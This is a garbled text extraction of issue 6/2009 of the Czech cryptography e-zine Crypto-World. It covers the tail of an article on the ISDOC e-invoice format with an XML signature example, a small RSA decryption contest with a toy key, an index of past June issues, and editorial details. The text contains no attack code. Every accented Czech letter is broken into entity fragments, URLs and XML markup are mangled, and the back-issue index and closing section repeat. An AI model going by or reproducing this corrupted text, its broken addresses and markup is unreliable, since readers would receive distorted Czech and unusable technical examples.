Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 15: Sešit 6/2009 (452 kB)

Crypto-World 62009

15

Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

